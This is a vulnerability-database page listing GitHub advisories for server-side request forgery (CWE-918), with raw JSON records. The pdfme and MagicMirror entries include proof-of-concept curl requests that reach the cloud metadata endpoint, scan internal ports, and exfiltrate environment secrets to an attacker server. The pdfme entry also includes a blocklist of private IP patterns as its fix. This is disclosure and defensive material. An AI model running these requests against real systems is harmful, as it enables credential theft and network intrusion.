CWE-918
AllowedServer-Side Request Forgery (SSRF)
Abstraction: Base · Status: Incomplete
The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
4658 vulnerabilities reference this CWE, most recent first.
GHSA-PGF5-GW7R-WXG7
Vulnerability from github – Published: 2026-03-30 18:31 – Updated: 2026-04-01 21:30CrewAI contains a server-side request forgery vulnerability that enables content acquisition from internal and cloud services, facilitated by the RAG search tools not properly validating URLs provided at runtime.
{
"affected": [],
"aliases": [
"CVE-2026-2286"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-30T16:16:04Z",
"severity": "CRITICAL"
},
"details": "CrewAI contains a server-side request forgery vulnerability that enables content acquisition from internal and cloud services, facilitated by the RAG search tools not properly validating URLs provided at runtime.",
"id": "GHSA-pgf5-gw7r-wxg7",
"modified": "2026-04-01T21:30:26Z",
"published": "2026-03-30T18:31:17Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2286"
},
{
"type": "WEB",
"url": "https://www.kb.cert.org/vuls/id/221883"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-PGFJ-JH8G-79G5
Vulnerability from github – Published: 2026-07-03 21:31 – Updated: 2026-07-03 21:31Server-side request forgery (ssrf) in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network.
{
"affected": [],
"aliases": [
"CVE-2026-57987"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-03T21:17:01Z",
"severity": "MODERATE"
},
"details": "Server-side request forgery (ssrf) in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network.",
"id": "GHSA-pgfj-jh8g-79g5",
"modified": "2026-07-03T21:31:39Z",
"published": "2026-07-03T21:31:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-57987"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57987"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-PGJQ-PWJV-WJPX
Vulnerability from github – Published: 2026-01-14 12:31 – Updated: 2026-06-30 03:35External Control of File Name or Path (CWE-73) combined with Server-Side Request Forgery (CWE-918) can allow an attacker to cause arbitrary file disclosure through a specially crafted credentials JSON payload in the Google Gemini connector configuration. This requires an attacker to have authenticated access with privileges sufficient to create or modify connectors (Alerts & Connectors: All). The server processes a configuration without proper validation, allowing for arbitrary network requests and for arbitrary file reads.
{
"affected": [],
"aliases": [
"CVE-2026-0532"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-01-14T11:15:50Z",
"severity": "HIGH"
},
"details": "External Control of File Name or Path (CWE-73) combined with Server-Side Request Forgery (CWE-918) can allow an attacker to cause arbitrary file disclosure through a specially crafted credentials JSON payload in the Google Gemini connector configuration. This requires an attacker to have authenticated access with privileges sufficient to create or modify connectors (Alerts \u0026 Connectors: All). The server processes a configuration without proper validation, allowing for arbitrary network requests and for arbitrary file reads.",
"id": "GHSA-pgjq-pwjv-wjpx",
"modified": "2026-06-30T03:35:24Z",
"published": "2026-01-14T12:31:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0532"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2026-0532"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429540"
},
{
"type": "WEB",
"url": "https://discuss.elastic.co/t/kibana-8-19-10-9-1-10-9-2-4-security-update-esa-2026-05/384524"
},
{
"type": "WEB",
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-0532.json"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-PGR9-W2R6-XP6R
Vulnerability from github – Published: 2025-08-12 00:30 – Updated: 2025-08-12 00:30Server-Side Request Forgery (SSRF) in Omnissa Secure Email Gateway (SEG) in SEG prior to 2.32 running on Windows and SEG prior to 2503 running on UAG allows routing of network traffic such as HTTP requests to internal networks.
{
"affected": [],
"aliases": [
"CVE-2025-25235"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-08-11T22:15:26Z",
"severity": "HIGH"
},
"details": "Server-Side Request Forgery (SSRF) in Omnissa Secure Email Gateway (SEG) in SEG prior to 2.32 running on Windows and SEG prior to 2503 running on UAG allows routing of network traffic such as HTTP requests to internal networks.",
"id": "GHSA-pgr9-w2r6-xp6r",
"modified": "2025-08-12T00:30:24Z",
"published": "2025-08-12T00:30:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25235"
},
{
"type": "WEB",
"url": "https://www.omnissa.com/omsa-2025-0003"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-PGX6-7JCQ-2QFF
Vulnerability from github – Published: 2026-03-20 20:45 – Updated: 2026-03-20 20:45Summary
The getB64BasePdf function in @pdfme/common fetches arbitrary URLs via fetch() without any validation when basePdf is a non-data-URI string and window is defined. An attacker who can control the basePdf field of a template (e.g., through a web application that accepts user-supplied templates) can force the server or client to make requests to arbitrary internal or external endpoints, enabling Server-Side Request Forgery (SSRF) in SSR contexts or blind request forgery in browser contexts.
Details
The vulnerability exists in packages/common/src/helper.ts:130-141. When getB64BasePdf receives a string that does not start with data:application/pdf;, and window is defined, it passes the string directly to fetch():
// packages/common/src/helper.ts:130-141
export const getB64BasePdf = async (
customPdf: ArrayBuffer | Uint8Array | string,
): Promise<string> => {
if (
typeof customPdf === 'string' &&
!customPdf.startsWith('data:application/pdf;') &&
typeof window !== 'undefined'
) {
const response = await fetch(customPdf); // <-- No URL validation
const blob = await response.blob();
return blob2Base64Pdf(blob);
}
// ...
};
The Zod schema for basePdf in packages/common/src/schema.ts:133-135 accepts any string:
export const CustomPdf = z.union([z.string(), ArrayBufferSchema, Uint8ArraySchema]);
export const BasePdf = z.union([CustomPdf, BlankPdf]);
The checkGenerateProps function at packages/common/src/helper.ts:279 only validates the Zod schema shape, which permits any string value. No URL allowlist, protocol restriction, or private IP filtering exists anywhere in the pipeline.
This function is called from multiple entry points:
- packages/generator/src/helper.ts:42 — during PDF generation
- packages/ui/src/hooks.ts:67 — during UI rendering
- packages/ui/src/helper.ts:292 — during template processing
The typeof window !== 'undefined' guard is commonly satisfied in SSR environments (Next.js, Nuxt with jsdom, Cloudflare Workers) where window is polyfilled but fetch has full network access without CORS restrictions.
PoC
1. Setup a vulnerable application
// server.js — Next.js API route or Express handler using pdfme
import { generate } from '@pdfme/generator';
export async function POST(req) {
const { template, inputs } = await req.json();
// Application accepts user-provided templates
const pdf = await generate({ template, inputs, plugins: {} });
return new Response(pdf);
}
2. Probe internal services via SSRF
# Attacker sends a template with basePdf pointing to an internal service
curl -X POST http://target-app.com/api/generate-pdf \
-H 'Content-Type: application/json' \
-d '{
"template": {
"basePdf": "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
"schemas": [[]]
},
"inputs": [{}]
}'
3. Port scanning internal network
# Scan internal hosts by observing response timing differences
for port in 80 443 3306 5432 6379 8080; do
curl -s -o /dev/null -w "%{time_total}" -X POST http://target-app.com/api/generate-pdf \
-H 'Content-Type: application/json' \
-d "{
\"template\": {
\"basePdf\": \"http://10.0.0.1:${port}/\",
\"schemas\": [[]]
},
\"inputs\": [{}]
}"
echo " - port $port"
done
4. Exfiltrate cloud metadata (AWS example)
# In SSR context, fetch reads the full response body and converts to base64
curl -X POST http://target-app.com/api/generate-pdf \
-H 'Content-Type: application/json' \
-d '{
"template": {
"basePdf": "http://169.254.169.254/latest/meta-data/",
"schemas": [[]]
},
"inputs": [{}]
}'
# The fetch will succeed; the response will fail PDF parsing,
# but error messages or timing differences leak information
Impact
- Cloud metadata exfiltration: In SSR deployments on AWS/GCP/Azure, attackers can reach instance metadata endpoints (
169.254.169.254) to steal IAM credentials, API tokens, and service account keys. - Internal network reconnaissance: Attackers can probe internal services, discover open ports, and map network topology by observing response timing and error differences.
- Internal service access: Requests to internal APIs (databases, caches, admin panels) that are not exposed to the internet but accessible from the server.
- Blind request forgery in browsers: Even with CORS restrictions limiting response reading, attackers can trigger state-changing requests to internal services (GET-based actions, webhook triggers).
- Data exfiltration via DNS: Attackers can use DNS-based exfiltration by crafting URLs like
http://<stolen-data>.attacker.comto leak information even when responses are not readable.
Recommended Fix
Add URL validation in getB64BasePdf before calling fetch(). At minimum, restrict to HTTPS and block private/reserved IP ranges:
// packages/common/src/helper.ts
const BLOCKED_HOSTNAME_PATTERNS = [
/^localhost$/i,
/^127\./,
/^10\./,
/^172\.(1[6-9]|2\d|3[01])\./,
/^192\.168\./,
/^169\.254\./,
/^0\./,
/^\[::1\]/,
/^\[fc/i,
/^\[fd/i,
/^\[fe80:/i,
];
function validatePdfUrl(urlString: string): void {
let parsed: URL;
try {
parsed = new URL(urlString);
} catch {
throw new Error(`Invalid basePdf URL: ${urlString}`);
}
if (parsed.protocol !== 'https:' && parsed.protocol !== 'http:') {
throw new Error(`basePdf URL must use http or https protocol, got: ${parsed.protocol}`);
}
const hostname = parsed.hostname;
for (const pattern of BLOCKED_HOSTNAME_PATTERNS) {
if (pattern.test(hostname)) {
throw new Error(`basePdf URL must not point to private/reserved addresses`);
}
}
}
export const getB64BasePdf = async (
customPdf: ArrayBuffer | Uint8Array | string,
): Promise<string> => {
if (
typeof customPdf === 'string' &&
!customPdf.startsWith('data:application/pdf;') &&
typeof window !== 'undefined'
) {
validatePdfUrl(customPdf); // <-- Add validation before fetch
const response = await fetch(customPdf);
const blob = await response.blob();
return blob2Base64Pdf(blob);
}
// ...
};
Additionally, consider documenting the security implications of passing user-controlled data as basePdf and providing an option for applications to supply their own URL validator or allowlist.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.5.9"
},
"package": {
"ecosystem": "npm",
"name": "@pdfme/common"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.5.10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-20T20:45:17Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "## Summary\n\nThe `getB64BasePdf` function in `@pdfme/common` fetches arbitrary URLs via `fetch()` without any validation when `basePdf` is a non-data-URI string and `window` is defined. An attacker who can control the `basePdf` field of a template (e.g., through a web application that accepts user-supplied templates) can force the server or client to make requests to arbitrary internal or external endpoints, enabling Server-Side Request Forgery (SSRF) in SSR contexts or blind request forgery in browser contexts.\n\n## Details\n\nThe vulnerability exists in `packages/common/src/helper.ts:130-141`. When `getB64BasePdf` receives a string that does not start with `data:application/pdf;`, and `window` is defined, it passes the string directly to `fetch()`:\n\n```typescript\n// packages/common/src/helper.ts:130-141\nexport const getB64BasePdf = async (\n customPdf: ArrayBuffer | Uint8Array | string,\n): Promise\u003cstring\u003e =\u003e {\n if (\n typeof customPdf === \u0027string\u0027 \u0026\u0026\n !customPdf.startsWith(\u0027data:application/pdf;\u0027) \u0026\u0026\n typeof window !== \u0027undefined\u0027\n ) {\n const response = await fetch(customPdf); // \u003c-- No URL validation\n const blob = await response.blob();\n return blob2Base64Pdf(blob);\n }\n // ...\n};\n```\n\nThe Zod schema for `basePdf` in `packages/common/src/schema.ts:133-135` accepts any string:\n\n```typescript\nexport const CustomPdf = z.union([z.string(), ArrayBufferSchema, Uint8ArraySchema]);\nexport const BasePdf = z.union([CustomPdf, BlankPdf]);\n```\n\nThe `checkGenerateProps` function at `packages/common/src/helper.ts:279` only validates the Zod schema shape, which permits any string value. No URL allowlist, protocol restriction, or private IP filtering exists anywhere in the pipeline.\n\nThis function is called from multiple entry points:\n- `packages/generator/src/helper.ts:42` \u2014 during PDF generation\n- `packages/ui/src/hooks.ts:67` \u2014 during UI rendering\n- `packages/ui/src/helper.ts:292` \u2014 during template processing\n\nThe `typeof window !== \u0027undefined\u0027` guard is commonly satisfied in SSR environments (Next.js, Nuxt with jsdom, Cloudflare Workers) where `window` is polyfilled but `fetch` has full network access without CORS restrictions.\n\n## PoC\n\n### 1. Setup a vulnerable application\n\n```javascript\n// server.js \u2014 Next.js API route or Express handler using pdfme\nimport { generate } from \u0027@pdfme/generator\u0027;\n\nexport async function POST(req) {\n const { template, inputs } = await req.json();\n // Application accepts user-provided templates\n const pdf = await generate({ template, inputs, plugins: {} });\n return new Response(pdf);\n}\n```\n\n### 2. Probe internal services via SSRF\n\n```bash\n# Attacker sends a template with basePdf pointing to an internal service\ncurl -X POST http://target-app.com/api/generate-pdf \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\n \"template\": {\n \"basePdf\": \"http://169.254.169.254/latest/meta-data/iam/security-credentials/\",\n \"schemas\": [[]]\n },\n \"inputs\": [{}]\n }\u0027\n```\n\n### 3. Port scanning internal network\n\n```bash\n# Scan internal hosts by observing response timing differences\nfor port in 80 443 3306 5432 6379 8080; do\n curl -s -o /dev/null -w \"%{time_total}\" -X POST http://target-app.com/api/generate-pdf \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \"{\n \\\"template\\\": {\n \\\"basePdf\\\": \\\"http://10.0.0.1:${port}/\\\",\n \\\"schemas\\\": [[]]\n },\n \\\"inputs\\\": [{}]\n }\"\n echo \" - port $port\"\ndone\n```\n\n### 4. Exfiltrate cloud metadata (AWS example)\n\n```bash\n# In SSR context, fetch reads the full response body and converts to base64\ncurl -X POST http://target-app.com/api/generate-pdf \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\n \"template\": {\n \"basePdf\": \"http://169.254.169.254/latest/meta-data/\",\n \"schemas\": [[]]\n },\n \"inputs\": [{}]\n }\u0027\n# The fetch will succeed; the response will fail PDF parsing,\n# but error messages or timing differences leak information\n```\n\n## Impact\n\n- **Cloud metadata exfiltration**: In SSR deployments on AWS/GCP/Azure, attackers can reach instance metadata endpoints (`169.254.169.254`) to steal IAM credentials, API tokens, and service account keys.\n- **Internal network reconnaissance**: Attackers can probe internal services, discover open ports, and map network topology by observing response timing and error differences.\n- **Internal service access**: Requests to internal APIs (databases, caches, admin panels) that are not exposed to the internet but accessible from the server.\n- **Blind request forgery in browsers**: Even with CORS restrictions limiting response reading, attackers can trigger state-changing requests to internal services (GET-based actions, webhook triggers).\n- **Data exfiltration via DNS**: Attackers can use DNS-based exfiltration by crafting URLs like `http://\u003cstolen-data\u003e.attacker.com` to leak information even when responses are not readable.\n\n## Recommended Fix\n\nAdd URL validation in `getB64BasePdf` before calling `fetch()`. At minimum, restrict to HTTPS and block private/reserved IP ranges:\n\n```typescript\n// packages/common/src/helper.ts\n\nconst BLOCKED_HOSTNAME_PATTERNS = [\n /^localhost$/i,\n /^127\\./,\n /^10\\./,\n /^172\\.(1[6-9]|2\\d|3[01])\\./,\n /^192\\.168\\./,\n /^169\\.254\\./,\n /^0\\./,\n /^\\[::1\\]/,\n /^\\[fc/i,\n /^\\[fd/i,\n /^\\[fe80:/i,\n];\n\nfunction validatePdfUrl(urlString: string): void {\n let parsed: URL;\n try {\n parsed = new URL(urlString);\n } catch {\n throw new Error(`Invalid basePdf URL: ${urlString}`);\n }\n\n if (parsed.protocol !== \u0027https:\u0027 \u0026\u0026 parsed.protocol !== \u0027http:\u0027) {\n throw new Error(`basePdf URL must use http or https protocol, got: ${parsed.protocol}`);\n }\n\n const hostname = parsed.hostname;\n for (const pattern of BLOCKED_HOSTNAME_PATTERNS) {\n if (pattern.test(hostname)) {\n throw new Error(`basePdf URL must not point to private/reserved addresses`);\n }\n }\n}\n\nexport const getB64BasePdf = async (\n customPdf: ArrayBuffer | Uint8Array | string,\n): Promise\u003cstring\u003e =\u003e {\n if (\n typeof customPdf === \u0027string\u0027 \u0026\u0026\n !customPdf.startsWith(\u0027data:application/pdf;\u0027) \u0026\u0026\n typeof window !== \u0027undefined\u0027\n ) {\n validatePdfUrl(customPdf); // \u003c-- Add validation before fetch\n const response = await fetch(customPdf);\n const blob = await response.blob();\n return blob2Base64Pdf(blob);\n }\n // ...\n};\n```\n\nAdditionally, consider documenting the security implications of passing user-controlled data as `basePdf` and providing an option for applications to supply their own URL validator or allowlist.",
"id": "GHSA-pgx6-7jcq-2qff",
"modified": "2026-03-20T20:45:17Z",
"published": "2026-03-20T20:45:17Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pdfme/pdfme/security/advisories/GHSA-pgx6-7jcq-2qff"
},
{
"type": "PACKAGE",
"url": "https://github.com/pdfme/pdfme"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "PDFME has SSRF via Unvalidated URL Fetch in `getB64BasePdf` When `basePdf` Is Attacker-Controlled"
}
GHSA-PH2X-JPWC-WRXQ
Vulnerability from github – Published: 2022-11-01 12:00 – Updated: 2022-11-02 12:00Server-Side Request Forgery (SSRF) vulnerability in Hitachi Infrastructure Analytics Advisor on Linux (Data Center Analytics, Analytics probe components), Hitachi Ops Center Analyzer on Linux (Hitachi Ops Center Analyzer detail view, Hitachi Ops Center Analyzer probe components) allows Server Side Request Forgery.
{
"affected": [],
"aliases": [
"CVE-2022-41552"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-11-01T03:15:00Z",
"severity": "CRITICAL"
},
"details": "Server-Side Request Forgery (SSRF) vulnerability in Hitachi Infrastructure Analytics Advisor on Linux (Data Center Analytics, Analytics probe components), Hitachi Ops Center Analyzer on Linux (Hitachi Ops Center Analyzer detail view, Hitachi Ops Center Analyzer probe components) allows Server Side Request Forgery.",
"id": "GHSA-ph2x-jpwc-wrxq",
"modified": "2022-11-02T12:00:35Z",
"published": "2022-11-01T12:00:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41552"
},
{
"type": "WEB",
"url": "https://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/hitachi-sec-2022-134/index.html"
},
{
"type": "WEB",
"url": "https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2022-134/index.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-PH42-42QJ-C8QG
Vulnerability from github – Published: 2024-11-30 21:30 – Updated: 2026-04-01 18:32Server-Side Request Forgery (SSRF) vulnerability in Gabe Livan Asset CleanUp: Page Speed Booster allows Server Side Request Forgery.This issue affects Asset CleanUp: Page Speed Booster: from n/a through 1.3.9.8.
{
"affected": [],
"aliases": [
"CVE-2024-53738"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-11-30T21:15:15Z",
"severity": "MODERATE"
},
"details": "Server-Side Request Forgery (SSRF) vulnerability in Gabe Livan Asset CleanUp: Page Speed Booster allows Server Side Request Forgery.This issue affects Asset CleanUp: Page Speed Booster: from n/a through 1.3.9.8.",
"id": "GHSA-ph42-42qj-c8qg",
"modified": "2026-04-01T18:32:35Z",
"published": "2024-11-30T21:30:40Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-53738"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/plugin/wp-asset-clean-up/vulnerability/wordpress-asset-cleanup-page-speed-booster-plugin-1-3-9-8-server-side-request-forgery-ssrf-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-PH6F-2CVQ-79HQ
Vulnerability from github – Published: 2026-05-05 20:53 – Updated: 2026-06-08 23:14Summary
An unauthenticated Server-Side Request Forgery (SSRF) vulnerability in the /cors endpoint allows any remote attacker to force the MagicMirror² server to perform arbitrary HTTP requests to internal networks, cloud metadata services, and localhost services. The endpoint also expands environment variable placeholders (**VAR_NAME**), enabling exfiltration of server-side secrets.
Details
The /cors endpoint in js/server_functions.js (function cors(), lines 37-78) acts as an open HTTP proxy with no authentication and no URL validation. Any user-supplied URL is fetched server-side via fetch() and the full response is returned to the caller.
Additionally, the replaceSecretPlaceholder() function (lines 21-25) expands any **VARIABLE_NAME** pattern in the URL with the corresponding process.env value before the request is made, allowing an attacker to exfiltrate environment variables (e.g. API keys, tokens, database credentials).
Vulnerable code path:
GET /cors?url=<attacker-controlled-url>
→ replaceSecretPlaceholder(url) // expands **ENV_VAR** → process.env.ENV_VAR
→ fetch(url) // no validation, no blocklist
→ response returned to attacker // full body, status, headers
Key issues: - No authentication required - No URL validation or blocklist for private/reserved IP ranges - No restriction on URL scheme or destination - Environment variable expansion in URL before fetch
PoC
Prerequisites: a running MagicMirror² instance accessible on the network (default: http://<host>:8080).
1. Basic SSRF — access cloud metadata (AWS IMDSv1):
curl "http://<target>:8080/cors?url=http://169.254.169.254/latest/meta-data/"
If the server runs on AWS EC2 without IMDSv2 enforcement, this returns instance metadata including IAM role credentials.
2. Internal network scanning:
curl "http://<target>:8080/cors?url=http://192.168.1.1/"
curl "http://<target>:8080/cors?url=http://127.0.0.1:3000/"
The attacker can probe internal services by observing response status codes and timing.
3. Environment variable exfiltration:
curl "http://<target>:8080/cors?url=http://<attacker-server>/?leak=**SECRET_API_KEY**"
The server expands **SECRET_API_KEY** to the value of process.env.SECRET_API_KEY before making the request, sending the secret to the attacker-controlled server as a query parameter.
Impact
- Cloud deployments (AWS/GCP/Azure): full compromise of cloud instance credentials via metadata service (169.254.169.254), potentially leading to lateral movement within the cloud account
- Internal network access: the server becomes a proxy to scan and interact with services on internal networks that are not directly reachable by the attacker
- Secret exfiltration: environment variables containing API keys, database credentials, or other sensitive configuration are directly readable
- Affected users: anyone running MagicMirror² exposed to an untrusted network (including LAN). The
/corsendpoint requires no authentication, so any host that can reach the MagicMirror HTTP port can exploit this vulnerability
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.35.0"
},
"package": {
"ecosystem": "npm",
"name": "magicmirror"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.36.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-42281"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-05T20:53:59Z",
"nvd_published_at": "2026-05-14T16:16:21Z",
"severity": "CRITICAL"
},
"details": "### Summary\n\nAn unauthenticated Server-Side Request Forgery (SSRF) vulnerability in the `/cors` endpoint allows any remote attacker to force the MagicMirror\u00b2 server to perform arbitrary HTTP requests to internal networks, cloud metadata services, and localhost services. The endpoint also expands environment variable placeholders (`**VAR_NAME**`), enabling exfiltration of server-side secrets.\n\n### Details\n\nThe `/cors` endpoint in `js/server_functions.js` (function `cors()`, lines 37-78) acts as an open HTTP proxy with no authentication and no URL validation. Any user-supplied URL is fetched server-side via `fetch()` and the full response is returned to the caller.\n\nAdditionally, the `replaceSecretPlaceholder()` function (lines 21-25) expands any `**VARIABLE_NAME**` pattern in the URL with the corresponding `process.env` value before the request is made, allowing an attacker to exfiltrate environment variables (e.g. API keys, tokens, database credentials).\n\n**Vulnerable code path:**\n\n```\nGET /cors?url=\u003cattacker-controlled-url\u003e\n \u2192 replaceSecretPlaceholder(url) // expands **ENV_VAR** \u2192 process.env.ENV_VAR\n \u2192 fetch(url) // no validation, no blocklist\n \u2192 response returned to attacker // full body, status, headers\n```\n\n**Key issues:**\n- No authentication required\n- No URL validation or blocklist for private/reserved IP ranges\n- No restriction on URL scheme or destination\n- Environment variable expansion in URL before fetch\n\n### PoC\n\n**Prerequisites:** a running MagicMirror\u00b2 instance accessible on the network (default: `http://\u003chost\u003e:8080`).\n\n**1. Basic SSRF \u2014 access cloud metadata (AWS IMDSv1):**\n\n```\ncurl \"http://\u003ctarget\u003e:8080/cors?url=http://169.254.169.254/latest/meta-data/\"\n```\n\nIf the server runs on AWS EC2 without IMDSv2 enforcement, this returns instance metadata including IAM role credentials.\n\n**2. Internal network scanning:**\n\n```\ncurl \"http://\u003ctarget\u003e:8080/cors?url=http://192.168.1.1/\"\ncurl \"http://\u003ctarget\u003e:8080/cors?url=http://127.0.0.1:3000/\"\n```\n\nThe attacker can probe internal services by observing response status codes and timing.\n\n**3. Environment variable exfiltration:**\n\n```\ncurl \"http://\u003ctarget\u003e:8080/cors?url=http://\u003cattacker-server\u003e/?leak=**SECRET_API_KEY**\"\n```\n\nThe server expands `**SECRET_API_KEY**` to the value of `process.env.SECRET_API_KEY` before making the request, sending the secret to the attacker-controlled server as a query parameter.\n\n### Impact\n\n- **Cloud deployments (AWS/GCP/Azure):** full compromise of cloud instance credentials via metadata service (169.254.169.254), potentially leading to lateral movement within the cloud account\n- **Internal network access:** the server becomes a proxy to scan and interact with services on internal networks that are not directly reachable by the attacker\n- **Secret exfiltration:** environment variables containing API keys, database credentials, or other sensitive configuration are directly readable\n- **Affected users:** anyone running MagicMirror\u00b2 exposed to an untrusted network (including LAN). The `/cors` endpoint requires no authentication, so any host that can reach the MagicMirror HTTP port can exploit this vulnerability",
"id": "GHSA-ph6f-2cvq-79hq",
"modified": "2026-06-08T23:14:14Z",
"published": "2026-05-05T20:53:59Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/MagicMirrorOrg/MagicMirror/security/advisories/GHSA-ph6f-2cvq-79hq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42281"
},
{
"type": "PACKAGE",
"url": "https://github.com/MagicMirrorOrg/MagicMirror"
},
{
"type": "WEB",
"url": "https://github.com/MagicMirrorOrg/MagicMirror/releases/tag/v2.36.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "MagicMirror vulnerable to unauthenticated SSRF via /cors endpoint"
}
GHSA-PH82-G2MR-P678
Vulnerability from github – Published: 2022-10-29 12:00 – Updated: 2022-11-03 19:00The Web Stories plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including 1.24.0 due to insufficient validation of URLs supplied via the 'url' parameter found via the /v1/hotlink/proxy REST API Endpoint. This made it possible for authenticated users to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.
{
"affected": [],
"aliases": [
"CVE-2022-3708"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-10-28T19:15:00Z",
"severity": "HIGH"
},
"details": "The Web Stories plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including 1.24.0 due to insufficient validation of URLs supplied via the \u0027url\u0027 parameter found via the /v1/hotlink/proxy REST API Endpoint. This made it possible for authenticated users to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.",
"id": "GHSA-ph82-g2mr-p678",
"modified": "2022-11-03T19:00:27Z",
"published": "2022-10-29T12:00:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3708"
},
{
"type": "WEB",
"url": "https://github.com/GoogleForCreators/web-stories-wp/commit/3ad2099f95155d658624ffac2e34ce0da739e34b"
},
{
"type": "WEB",
"url": "https://github.com/GoogleForCreators/web-stories-wp/compare/v1.24.0...v1.25.0"
},
{
"type": "WEB",
"url": "https://wordpress.org/plugins/web-stories"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7817a840-325a-4709-8374-84bb32d98d0e?source=cve"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/vulnerability-advisories-continued/#CVE-2022-3708"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-PHH2-62X4-4JFJ
Vulnerability from github – Published: 2022-05-24 17:34 – Updated: 2022-05-24 17:34JetBrains YouTrack before 2020.3.5333 was vulnerable to SSRF.
{
"affected": [],
"aliases": [
"CVE-2020-27626"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-11-16T15:15:00Z",
"severity": "MODERATE"
},
"details": "JetBrains YouTrack before 2020.3.5333 was vulnerable to SSRF.",
"id": "GHSA-phh2-62x4-4jfj",
